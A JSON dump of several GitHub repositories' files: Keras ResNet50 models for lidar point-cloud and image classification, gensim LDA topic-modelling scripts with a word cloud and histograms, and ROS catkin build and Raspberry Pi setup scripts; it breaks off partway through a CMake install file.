s,padding=\"valid\", name = conv_name_base + '2a', kernel_initializer = glorot_uniform(seed=0))(X)\n X = BatchNormalization(axis=2, name = bn_name_base + '2a')(X)\n X = Activation('relu')(X)\n X = Conv1D(filters = F2, kernel_size=(f), strides=(1), name = conv_name_base + '2b', padding=\"same\",kernel_initializer = glorot_uniform(seed=0))(X)\n X = BatchNormalization(axis=2, name= bn_name_base + '2b')(X)\n X = Activation('relu')(X)\n X = Conv1D(filters = F3, kernel_size=(1), strides = (1), name= conv_name_base + '2c',padding=\"valid\", kernel_initializer=glorot_uniform(seed=0))(X)\n X = BatchNormalization(axis=2, name=bn_name_base + '2c')(X)\n X_shortcut = Conv1D(filters = F3, kernel_size= (1), strides=(s), name=conv_name_base + '1', padding=\"valid\", kernel_initializer=glorot_uniform(seed=0))(X_shortcut)\n X_shortcut = BatchNormalization(axis=2, name=bn_name_base+'1')(X_shortcut)\n X = Add()([X_shortcut,X])\n X = Activation(\"relu\")(X)\n return X\ndef ResNet50(input_shape=(1024, 3), classes=2):\n X_input = Input(input_shape)\n X = ZeroPadding1D((3))(X_input)\n X = Conv1D(64, (7), strides=(2), name='conv1', kernel_initializer=glorot_uniform(seed=0))(X)\n X = BatchNormalization(name='bn_conv1')(X)\n X = Activation('relu')(X)\n X = MaxPooling1D((4), strides= (4))(X)\n X = convolutional_block(X, f=3, filters=[64, 64, 256], stage=2, block='a', s=1)\n X = identity_block(X, 3, [64, 64, 256], stage=2, block='b')\n X = identity_block(X, 3, [64, 64, 256], stage=2, block='c')\n X = convolutional_block(X, f = 3, filters = [128, 128, 512], stage = 3, block='a', s = 2)\n X = identity_block(X, 3, [128, 128, 512], stage=3, block='b')\n X = identity_block(X, 3, [128, 128, 512], stage=3, block='c')\n X = identity_block(X, 3, [128, 128, 512], stage=3, block='d')\n # X = AveragePooling1D((4), name='avg_pool0')(X)\n\n X = convolutional_block(X, f = 3, filters = [256, 256, 1024], stage = 4, block='a', s = 2)\n X = identity_block(X, 3, [256, 256, 1024], stage=4, block='b')\n X = identity_block(X, 3, [256, 256, 1024], stage=4, block='c')\n X = identity_block(X, 3, [256, 256, 1024], stage=4, block='d')\n X = identity_block(X, 3, [256, 256, 1024], stage=4, block='e')\n X = identity_block(X, 3, [256, 256, 1024], stage=4, block='f')\n X = convolutional_block(X, f = 3, filters = [512, 512, 2048], stage = 5, block='a', s = 2)\n X = identity_block(X, 3, [512, 512, 2048], stage=5, block='b')\n X = identity_block(X, 3, [512, 512, 2048], stage=5, block='c')\n X = AveragePooling1D((2), name=\"avg_pool\")(X)\n X = Flatten()(X)\n X = Dense(classes, activation='softmax', name='fc' + str(classes), kernel_initializer = glorot_uniform(seed=0))(X)\n model = Model(inputs = X_input, outputs = X, name='ResNet50')\n return model\n"
},
{
"alpha_fraction": 0.6755017042160034,
"alphanum_fraction": 0.6985990405082703,
"avg_line_length": 36.197181701660156,
"blob_id": "8e7740663c2fa0ae82c464f145179a185726063a",
"content_id": "86f0daca0edd6da736fb5ac5950a76b81d22c69a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2641,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 71,
"path": "/residual/util.py",
"repo_name": "zazgf/littlelearn",
"src_encoding": "UTF-8",
"text": "import open3d as o3d\nimport numpy as np\nimport os\nimport tensorflow as tf\nfrom tensorflow.compat.v1 import ConfigProto\nfrom tensorflow.compat.v1 import InteractiveSession\nfrom keras.initializers import glorot_uniform\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\nfrom keras import layers\nfrom keras.layers import Input, Add,Dense,Activation,ZeroPadding2D,BatchNormalization,Flatten,Conv2D,AveragePooling2D,MaxPooling2D,GlobalMaxPooling2D\nfrom keras.models import Model,load_model\nfrom keras.preprocessing import image\nfrom keras.utils import layer_utils\nfrom keras.utils.data_utils import get_file\nfrom keras.applications.imagenet_utils import preprocess_input\nimport imageio\nimport keras.backend as K\nimport math\n# K.set_image_data_format('channels_last')\n# K.set_learning_phase(1)\n# config = ConfigProto()\n# config.gpu_options.allow_growth = True\n# session = InteractiveSession(config=config)\n# K.set_session(session)\nNUM_POINT = 1024\nnpoints = 3\nclasses = 2\nroot_path = \"lidar_data\"\ntrain_dir = os.path.join(root_path,'s1')\ntest_dir = os.path.join(root_path,'s2')\n\nT1=[]\nTE=[]\nfor i, ret in enumerate(os.walk(train_dir)):\n for i, filename in enumerate(ret[2]):\n if filename.startswith(\".\"):\n continue \n \n pcd = o3d.io.read_point_cloud(os.path.join(train_dir,filename))\n point_set = np.asarray(pcd.points)\n point_set = point_set[:NUM_POINT, 0:npoints]\n point_set = np.array([point_set])\n point_set = point_set[0]\n # np.reshape(point_set,[32,32,3])\n T1.append(point_set)\n TE.append([0,1])\nfor i, ret in enumerate(os.walk(test_dir)):\n for i, filename in enumerate(ret[2]):\n if filename.startswith(\".\"):\n continue \n pcd = o3d.io.read_point_cloud(os.path.join(test_dir,filename))\n point_set = np.asarray(pcd.points)\n point_set = point_set[:NUM_POINT, 0:npoints]\n point_set = np.array([point_set])\n point_set = point_set[0]\n # np.reshape(point_set,[32,32,3])\n print(point_set.shape)\n T1.append(point_set)\n TE.append([1,0])\nT1=np.asarray(T1)\nTE=np.asarray(TE)\nfrom sklearn.model_selection import train_test_split\nx_train,x_test,y_train,y_test=train_test_split(T1,TE,test_size=0.2,random_state=0)\nprint(x_train.shape)\nprint(y_train)\nfrom lidar_net import ResNet50,identity_block,convolutional_block\nif __name__ == '__main__':\n model = ResNet50(input_shape = (1024, 3), classes = classes)\n model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\n model.summary()\n model.fit(x_train, y_train, epochs = 2, batch_size = 32)\n"
},
{
"alpha_fraction": 0.7727272510528564,
"alphanum_fraction": 0.7727272510528564,
"avg_line_length": 10,
"blob_id": "b2f99e330f3eb433be580ad30b5138dadb7f6eb6",
"content_id": "bc1f112df5176bb1ab2b25b9678737668146ded7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 22,
"license_type": "no_license",
"max_line_length": 13,
"num_lines": 2,
"path": "/README.md",
"repo_name": "zazgf/littlelearn",
"src_encoding": "UTF-8",
"text": "# littlelearn\nmy demo\n"
},
{
"alpha_fraction": 0.5956554412841797,
"alphanum_fraction": 0.6339391469955444,
"avg_line_length": 45.728641510009766,
"blob_id": "50606d170adb7e8d0a43341c82bb9f8ed33c2115",
"content_id": "4621ba414f2d695d79f96aab309ea89b227fcfde",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9299,
"license_type": "no_license",
"max_line_length": 189,
"num_lines": 199,
"path": "/residual/mt.py",
"repo_name": "zazgf/littlelearn",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom keras import layers\nfrom keras.layers import Input, Add,Dense,Activation,ZeroPadding2D,BatchNormalization,Flatten,Conv2D,AveragePooling2D,MaxPooling2D,GlobalMaxPooling2D\nfrom keras.models import Model,load_model\nfrom keras.preprocessing import image\nfrom keras.utils import layer_utils\nfrom keras.utils.data_utils import get_file\nfrom keras.applications.imagenet_utils import preprocess_input\nimport pydot\nfrom IPython.display import SVG\nfrom keras.utils.vis_utils import model_to_dot\nfrom keras.utils import plot_model\nfrom keras.initializers import glorot_uniform\nimport scipy.misc\nfrom matplotlib.pyplot import imshow\nfrom matplotlib import pyplot as plt\nfrom keras.preprocessing.image import ImageDataGenerator\nimport os\nfrom keras import callbacks\nimport time\nimport tensorflow as tf\nfrom tensorflow.compat.v1 import ConfigProto\nfrom tensorflow.compat.v1 import InteractiveSession\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\nimport imageio\nimport keras.backend as K\nimport math\nK.set_image_data_format('channels_last')\nK.set_learning_phase(1)\nconfig = ConfigProto()\nconfig.gpu_options.allow_growth = True\nsession = InteractiveSession(config=config)\nK.set_session(session)\n\nmethod_2 = False\nmethod_3 = True\n\ntrain_data_path = 'data/train'\nvalidation_data_path = 'data/valid'\n\nimg_height = 150\nimg_width = 150\nclasses = 2\n\n\ndef identity_block(X, f, filters, stage, block):\n conv_name_base = 'res' + str(stage) + block + '_branch'\n bn_name_base = 'bn' + str(stage) + block + '_branch'\n F1, F2, F3 = filters\n X_shortcut = X\n X = Conv2D(filters = F1, kernel_size=(1,1) ,strides=(1,1),padding='valid',name=conv_name_base+'2a',kernel_initializer=glorot_uniform(seed=0))(X)\n X = BatchNormalization(axis=3,name=bn_name_base+'2a')(X)\n X = Activation('relu')(X)\n X = Conv2D(filters = F2,kernel_size=(f,f),strides=(1,1),padding='same',name = conv_name_base + '2b',kernel_initializer=glorot_uniform(seed=0))(X)\n X = BatchNormalization(axis=3,name = bn_name_base + '2b')(X)\n X = Activation('relu')(X)\n X = Conv2D(filters=F3,kernel_size=(1,1),strides=(1,1),padding='valid',name = conv_name_base+'2c',kernel_initializer=glorot_uniform(seed=0))(X)\n X = BatchNormalization(axis=3,name=bn_name_base+'2c')(X)\n X= Add()([X,X_shortcut])\n X = Activation('relu')(X)\n return X\ndef convolutional_block(X, f, filters, stage, block, s = 2):\n conv_name_base = 'res' + str(stage) + block + '_branch'\n bn_name_base = 'bn' + str(stage) + block + '_branch'\n F1, F2, F3 = filters\n X_shortcut = X\n X = Conv2D(F1, (1, 1), strides = (s,s), name = conv_name_base + '2a', kernel_initializer = glorot_uniform(seed=0))(X)\n X = BatchNormalization(axis = 3, name = bn_name_base + '2a')(X)\n X = Activation('relu')(X)\n X = Conv2D(filters = F2, kernel_size = (f, f), strides = (1,1), padding = 'same', name = conv_name_base + '2b', kernel_initializer = glorot_uniform(seed=0))(X)\n X = BatchNormalization(axis = 3, name = bn_name_base + '2b')(X)\n X = Activation('relu')(X)\n X = Conv2D(filters = F3, kernel_size = (1, 1), strides = (1,1), padding = 'valid', name = conv_name_base + '2c', kernel_initializer = glorot_uniform(seed=0))(X)\n X = BatchNormalization(axis = 3, name = bn_name_base + '2c')(X)\n X_shortcut = Conv2D(filters = F3, kernel_size = (1, 1), strides = (s,s), padding = 'valid', name = conv_name_base + '1',\n kernel_initializer = glorot_uniform(seed=0))(X_shortcut)\n X_shortcut = BatchNormalization(axis = 3, name = bn_name_base + '1')(X_shortcut)\n X = Add()([X, X_shortcut])\n X = Activation('relu')(X)\n return X\ndef ResNet50(input_shape=(64, 64, 3), classes=6):\n X_input = Input(input_shape)\n X = ZeroPadding2D((3, 3))(X_input)\n X = Conv2D(64, (7, 7), strides=(2, 2), name='conv1', kernel_initializer=glorot_uniform(seed=0))(X)\n X = BatchNormalization(axis=3, name='bn_conv1')(X)\n X = Activation('relu')(X)\n X = MaxPooling2D((3, 3), strides=(2, 2))(X)\n X = convolutional_block(X, f=3, filters=[64, 64, 256], stage=2, block='a', s=1)\n X = identity_block(X, 3, [64, 64, 256], stage=2, block='b')\n X = identity_block(X, 3, [64, 64, 256], stage=2, block='c')\n X = convolutional_block(X, f = 3, filters = [128, 128, 512], stage = 3, block='a', s = 2)\n X = identity_block(X, 3, [128, 128, 512], stage=3, block='b')\n X = identity_block(X, 3, [128, 128, 512], stage=3, block='c')\n X = identity_block(X, 3, [128, 128, 512], stage=3, block='d')\n X = convolutional_block(X, f = 3, filters = [256, 256, 1024], stage = 4, block='a', s = 2)\n X = identity_block(X, 3, [256, 256, 1024], stage=4, block='b')\n X = identity_block(X, 3, [256, 256, 1024], stage=4, block='c')\n X = identity_block(X, 3, [256, 256, 1024], stage=4, block='d')\n X = identity_block(X, 3, [256, 256, 1024], stage=4, block='e')\n X = identity_block(X, 3, [256, 256, 1024], stage=4, block='f')\n X = convolutional_block(X, f = 3, filters = [512, 512, 2048], stage = 5, block='a', s = 2)\n X = identity_block(X, 3, [512, 512, 2048], stage=5, block='b')\n X = identity_block(X, 3, [512, 512, 2048], stage=5, block='c')\n X = AveragePooling2D((2,2), name=\"avg_pool\")(X)\n X = Flatten()(X)\n X = Dense(classes, activation='softmax', name='fc' + str(classes), kernel_initializer = glorot_uniform(seed=0))(X)\n model = Model(inputs = X_input, outputs = X, name='ResNet50')\n return model\n\nif __name__ == '__main__':\n model = ResNet50(input_shape = (img_width, img_height, 3), classes = classes)\n model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\n model.summary()\n\n if method_2:\n DATA_DIR = 'data'\n TRAIN_DIR = os.path.join(DATA_DIR, 'train')\n VALID_DIR = os.path.join(DATA_DIR, 'valid')\n SIZE = (64, 64)\n BATCH_SIZE = 6\n num_train_samples = sum([len(files) for r, d, files in os.walk(TRAIN_DIR)])\n num_valid_samples = sum([len(files) for r, d, files in os.walk(VALID_DIR)])\n\n num_train_steps = math.floor(num_train_samples/BATCH_SIZE)\n num_valid_steps = math.floor(num_valid_samples/BATCH_SIZE)\n\n gen = keras.preprocessing.image.ImageDataGenerator()\n val_gen = keras.preprocessing.image.ImageDataGenerator(horizontal_flip=True, vertical_flip=True)\n\n batches = gen.flow_from_directory(TRAIN_DIR, target_size=SIZE, class_mode='categorical', shuffle=True, batch_size=BATCH_SIZE)\n val_batches = val_gen.flow_from_directory(VALID_DIR, target_size=SIZE, class_mode='categorical', shuffle=True, batch_size=BATCH_SIZE)\n if method_3:\n batch_size = 4\n \n num_train_samples = sum([len(files) for r, d, files in os.walk(train_data_path)])\n num_valid_samples = sum([len(files) for r, d, files in os.walk(validation_data_path)])\n\n samples_per_epoch = math.floor(num_train_samples/batch_size)\n validation_steps = math.floor(num_valid_samples/batch_size)\n\n epochs = 2\n train_datagen = ImageDataGenerator(\n rescale=1. / 255,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True)\n test_datagen = ImageDataGenerator(rescale=1. / 255)\n\n train_generator = train_datagen.flow_from_directory(\n train_data_path,\n target_size=(img_height, img_width),\n batch_size=batch_size,\n class_mode='categorical')\n\n validation_generator = test_datagen.flow_from_directory(\n validation_data_path,\n target_size=(img_height, img_width),\n batch_size=batch_size,\n class_mode='categorical')\n\n if method_2:\n early_stopping = EarlyStopping(patience=10)\n checkpointer = ModelCheckpoint('resnet50_best.h5', verbose=1, save_best_only=True)\n log_dir = './tf-log/'\n tb_cb = callbacks.TensorBoard(log_dir=log_dir, histogram_freq=0)\n cbks = [tb_cb]\n with tf.device('/GPU:0'):\n model.fit_generator(batches, steps_per_epoch=num_train_steps, epochs=20, callbacks=[early_stopping, checkpointer], validation_data=val_batches, validation_steps=num_valid_steps)\n plot_model(model, to_file='model.png')\n SVG(model_to_dot(model).create(prog='dot', format='svg'))\n model.save(\"myMode\")\n if method_3:\n log_dir = './tf-log/'\n tb_cb = callbacks.TensorBoard(log_dir=log_dir, histogram_freq=0)\n cbks = [tb_cb]\n start = time.time()\n with tf.device('/GPU:0'):\n model.fit_generator(\n train_generator,\n steps_per_epoch=samples_per_epoch,\n epochs=epochs,\n callbacks=cbks,\n validation_data=validation_generator,\n validation_steps=validation_steps)\n target_dir = './models/'\n if not os.path.exists(target_dir):\n os.mkdir(target_dir)\n model.save('./models/model.h5')\n model.save_weights('./models/weights.h5')\n end = time.time()\n dur = end-start\n if dur<60:\n print(\"Execution Time:\",dur,\"seconds\")\n elif dur>60 and dur<3600:\n dur=dur/60\n print(\"Execution Time:\",dur,\"minutes\")\n else:\n dur=dur/(60*60)\n print(\"Execution Time:\",dur,\"hours\")\n"
}
] | 5 |
Ihmana/machine_ch4 | https://github.com/Ihmana/machine_ch4 | 9091e89a6b0a8b897654d2753155e000bede582d | 8e8ffed7db77fe6e601b6b0c3cb34f83ba7fc195 | 582e25b79ad95371d69dc346b24d4570efeb6525 | refs/heads/master | 2020-04-02T04:14:50.789132 | 2016-06-29T13:25:06 | 2016-06-29T13:25:06 | 62,227,689 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6871310472488403,
"alphanum_fraction": 0.7048406004905701,
"avg_line_length": 24.696969985961914,
"blob_id": "0d050ff728a376052a4635c86a80d118262aa0c3",
"content_id": "df4383de0d7f9de461a639a3fc867d2355eabd85",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1055,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 33,
"path": "/word_cloud.py",
"repo_name": "Ihmana/machine_ch4",
"src_encoding": "UTF-8",
"text": "# -*- coding:utf-8 -*-\n\nfrom gensim import corpora, models, similarities\ncorpus = corpora.BleiCorpus('.\\/ap\\/ap.dat', '.\\/ap\\/vocab.txt')\n\nu'''トピックモデルの作成'''\nmodel = models.ldamodel.LdaModel(corpus, num_topics=100, id2word=corpus.id2word)\ntopics = [model[c] for c in corpus]\n\nu'''トピックを構成する単語と確率'''\nfor topic in model.show_topics(-1):\n print topic\n\nu'''トピックの出現回数を表した配列'''\nimport numpy as np\ncounts = np.zeros(100)\nfor doc_top in topics:\n for ti, _ in doc_top:\n counts[ti] += 1\n\nu'''トピックの中で出現する単語とその確率のリスト'''\nu'''最も出現するトピック'''\nwords = model.show_topic(counts.argmax(), 64)\nu'''最も書かれることが少ないトピック'''\n#words = model.show_topic(counts.argmin(), 64)\n\nu'''最も出現確率の高いトピックの可視化'''\nimport matplotlib.pyplot as plt\nfrom wordcloud import WordCloud\nwordclod = WordCloud().generate_from_frequencies(words)\nplt.imshow(wordclod)\nplt.axis(\"off\")\nplt.show()"
},
{
"alpha_fraction": 0.650040864944458,
"alphanum_fraction": 0.6835650205612183,
"avg_line_length": 27.465116500854492,
"blob_id": "6251b3458bf66fe3a94e8b38bfe48ab585662abb",
"content_id": "f6d6874db5ccd573ad261d9276810259481536a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1343,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 43,
"path": "/histgram.py",
"repo_name": "Ihmana/machine_ch4",
"src_encoding": "UTF-8",
"text": "# -*- coding:utf-8 -*-\n\nfrom gensim import corpora, models, similarities\ncorpus = corpora.BleiCorpus('.\\/ap\\/ap.dat', '.\\/ap\\/vocab.txt')\n\nu'''トピックモデルの作成'''\nmodel = models.ldamodel.LdaModel(corpus, num_topics=100, id2word=corpus.id2word)\n\ntopics = [model[c] for c in corpus]\nprint topics[0]\n\nu'''各文書のトピック数のリスト'''\ntopic_len = []\nfor i in range(len(topics)):\n topic_len.append(len(topics[i]))\n\n# import numpy as np\n# lens = np.array([len(t) for t in topics])\n\nu'''alphaの値がそのままでヒストグラムを出力'''\nimport matplotlib.pyplot as plt\n\nplt.hist(topic_len, bins=20)\nplt.title(\"Histgram\")\nplt.xlabel(\"number of topics\")\nplt.ylabel(\"number of documents\")\nplt.show()\n\n# u'''alpha=1にしてヒストグラムを標準のものと比較する'''\n# model2 = models.ldamodel.LdaModel(corpus, num_topics=100, id2word=corpus.id2word, alpha=1)\n# topics2 = [model2[c] for c in corpus]\n#\n# topic2_len = []\n# for i in range(len(topics2)):\n# topic2_len.append(len(topics2[i]))\n#\n# plt.hist(topic_len, label=\"default alpha\", bins=20, range=(-10, 40), alpha=0.5, color=\"blue\")\n# plt.hist(topic2_len, label=\"alpha=1\", bins=20, range=(-10, 40), alpha=0.5, color=\"red\")\n# plt.legend()\n# plt.title(\"Histgram\")\n# plt.xlabel(\"number of topics\")\n# plt.ylabel(\"number of documents\")\n# plt.show()"
},
{
"alpha_fraction": 0.6661807298660278,
"alphanum_fraction": 0.680757999420166,
"avg_line_length": 25.423076629638672,
"blob_id": "390dde03870fc1125768b71d081d32a0fcf7ed23",
"content_id": "1436a98251185b627ce3a90585fd15a0229ae1df",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 734,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 26,
"path": "/comparison.py",
"repo_name": "Ihmana/machine_ch4",
"src_encoding": "UTF-8",
"text": "# -*- coding:utf-8 -*-\n\nfrom gensim import corpora, models, similarities\ncorpus = corpora.BleiCorpus('.\\/ap\\/ap.dat', '.\\/ap\\/vocab.txt')\n\nu'''モデルの作成'''\nmodel = models.ldamodel.LdaModel(corpus, num_topics=100, id2word=corpus.id2word)\ntopics = [model[c] for c in corpus]\n\nu'''トピックベクトルの作成'''\nimport numpy as np\ndense = np.zeros((len(topics), 100), float)\nfor ti,t in enumerate(topics):\n for tj, v in t:\n dense[ti, tj] = v\n\nu'''距離行列の作成'''\nfrom scipy.spatial import distance\npairwise = distance.squareform(distance.pdist(dense))\n\nlargest = pairwise.max()\nfor ti in range(len(topics)):\n pairwise[ti, ti] = largest + 1\n\ndef closet_to(doc_id):\n return pairwise[doc_id].argmin()"
}
] | 3 |
DoubleWB/old_ros | https://github.com/DoubleWB/old_ros | e70f609a82a46d520febb887fe49a4de88015cbc | 89d9c7b034b478c49d892ed891d70b11b94cf734 | 1daf1579cf35373beaa18b4bb02fe33feee86cd7 | refs/heads/master | 2020-03-29T10:04:44.731732 | 2018-09-21T16:21:06 | 2018-09-21T16:21:06 | 149,788,543 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7783375382423401,
"alphanum_fraction": 0.7783375382423401,
"avg_line_length": 38.70000076293945,
"blob_id": "01002a1e514a9e1108d7628628ed6a08ba42031d",
"content_id": "76c072a04e9b926477eb0549be9e3aa2bfc1ebdf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 397,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 10,
"path": "/build/basic_teleop/CMakeFiles/basic_teleop_node.dir/cmake_clean.cmake",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "FILE(REMOVE_RECURSE\n \"CMakeFiles/basic_teleop_node.dir/src/depth_stream_stabilizer.cpp.o\"\n \"/home/will/catkin_ws/devel/lib/basic_teleop/basic_teleop_node.pdb\"\n \"/home/will/catkin_ws/devel/lib/basic_teleop/basic_teleop_node\"\n)\n\n# Per-language clean rules from dependency scanning.\nFOREACH(lang CXX)\n INCLUDE(CMakeFiles/basic_teleop_node.dir/cmake_clean_${lang}.cmake OPTIONAL)\nENDFOREACH(lang)\n"
},
{
"alpha_fraction": 0.6350710988044739,
"alphanum_fraction": 0.7203791737556458,
"avg_line_length": 20,
"blob_id": "a1b7c759fb745d78bcb934ff5b2cc4c52e850a75",
"content_id": "672c319b87bfe49a7c1460451167cc871904a19c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 211,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 10,
"path": "/src/basic_teleop/misc/pi_ros_setup.bash",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "#!/bin/bash \nsudo chown root.gpio /dev/gpiomem\nsudo chmod g+rw /dev/gpiomem\ncd ~/tobot_ws/catkin_ws2\ncatkin_make\ncd devel\n. setup.bash\nexport ROS_MASTER_URI=http://10.0.0.52:11311/\nexport ROS_IP=10.0.0.49\ncd ~\n\n"
},
{
"alpha_fraction": 0.7950000166893005,
"alphanum_fraction": 0.7950000166893005,
"avg_line_length": 49,
"blob_id": "978b099b4a82a9c5e479cc1edb8b05ffef8c7d4b",
"content_id": "43e94ce296c7d2a369abc621ab2e64509c5198b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 200,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 4,
"path": "/devel/share/basic_teleop/cmake/basic_teleop-msg-paths.cmake",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-msg-paths.cmake.develspace.in\n\nset(basic_teleop_MSG_INCLUDE_DIRS \"/home/will/catkin_ws/src/basic_teleop/msg\")\nset(basic_teleop_MSG_DEPENDENCIES std_msgs;sensor_msgs)\n"
},
{
"alpha_fraction": 0.7884615659713745,
"alphanum_fraction": 0.7884615659713745,
"avg_line_length": 33.66666793823242,
"blob_id": "6af1abfca8f2574b44f4c940755cbf5ee944e62d",
"content_id": "cf0a395e319bdcad9e98a5a08a0ce8f3ba94e940",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 312,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 9,
"path": "/build/basic_teleop/CMakeFiles/basic_teleop_generate_messages_cpp.dir/cmake_clean.cmake",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "FILE(REMOVE_RECURSE\n \"CMakeFiles/basic_teleop_generate_messages_cpp\"\n \"/home/will/catkin_ws/devel/include/basic_teleop/Move.h\"\n)\n\n# Per-language clean rules from dependency scanning.\nFOREACH(lang)\n INCLUDE(CMakeFiles/basic_teleop_generate_messages_cpp.dir/cmake_clean_${lang}.cmake OPTIONAL)\nENDFOREACH(lang)\n"
},
{
"alpha_fraction": 0.7691240310668945,
"alphanum_fraction": 0.7709076404571533,
"avg_line_length": 62.0625,
"blob_id": "8024fab60d32beebe9f903b3994c56607bdeffb3",
"content_id": "09a7b864eb532e5bd71a60c223f52ad48f5c46c8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 5046,
"license_type": "no_license",
"max_line_length": 196,
"num_lines": 80,
"path": "/build/basic_teleop/cmake_install.cmake",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "# Install script for directory: /home/will/catkin_ws/src/basic_teleop\n\n# Set the install prefix\nIF(NOT DEFINED CMAKE_INSTALL_PREFIX)\n SET(CMAKE_INSTALL_PREFIX \"/home/will/catkin_ws/install\")\nENDIF(NOT DEFINED CMAKE_INSTALL_PREFIX)\nSTRING(REGEX REPLACE \"/$\" \"\" CMAKE_INSTALL_PREFIX \"${CMAKE_INSTALL_PREFIX}\")\n\n# Set the install configuration name.\nIF(NOT DEFINED CMAKE_INSTALL_CONFIG_NAME)\n IF(BUILD_TYPE)\n STRING(REGEX REPLACE \"^[^A-Za-z0-9_]+\" \"\"\n CMAKE_INSTALL_CONFIG_NAME \"${BUILD_TYPE}\")\n ELSE(BUILD_TYPE)\n SET(CMAKE_INSTALL_CONFIG_NAME \"\")\n ENDIF(BUILD_TYPE)\n MESSAGE(STATUS \"Install configuration: \\\"${CMAKE_INSTALL_CONFIG_NAME}\\\"\")\nENDIF(NOT DEFINED CMAKE_INSTALL_CONFIG_NAME)\n\n# Set the component getting installed.\nIF(NOT CMAKE_INSTALL_COMPONENT)\n IF(COMPONENT)\n MESSAGE(STATUS \"Install component: \\\"${COMPONENT}\\\"\")\n SET(CMAKE_INSTALL_COMPONENT \"${COMPONENT}\")\n ELSE(COMPONENT)\n SET(CMAKE_INSTALL_COMPONENT)\n ENDIF(COMPONENT)\nENDIF(NOT CMAKE_INSTALL_COMPONENT)\n\n# Install shared libraries without execute permission?\nIF(NOT DEFINED CMAKE_INSTALL_SO_NO_EXE)\n SET(CMAKE_INSTALL_SO_NO_EXE \"1\")\nENDIF(NOT DEFINED CMAKE_INSTALL_SO_NO_EXE)\n\nIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n FILE(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/basic_teleop/msg\" TYPE FILE FILES \"/home/will/catkin_ws/src/basic_teleop/msg/Move.msg\")\nENDIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n\nIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n FILE(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/basic_teleop/cmake\" TYPE FILE FILES \"/home/will/catkin_ws/build/basic_teleop/catkin_generated/installspace/basic_teleop-msg-paths.cmake\")\nENDIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n\nIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n FILE(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/include\" TYPE DIRECTORY FILES \"/home/will/catkin_ws/devel/include/basic_teleop\")\nENDIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n\nIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n FILE(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/roseus/ros\" TYPE DIRECTORY FILES \"/home/will/catkin_ws/devel/share/roseus/ros/basic_teleop\")\nENDIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n\nIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n FILE(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/common-lisp/ros\" TYPE DIRECTORY FILES \"/home/will/catkin_ws/devel/share/common-lisp/ros/basic_teleop\")\nENDIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n\nIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n execute_process(COMMAND \"/usr/bin/python\" -m compileall \"/home/will/catkin_ws/devel/lib/python2.7/dist-packages/basic_teleop\")\nENDIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n\nIF(NOT 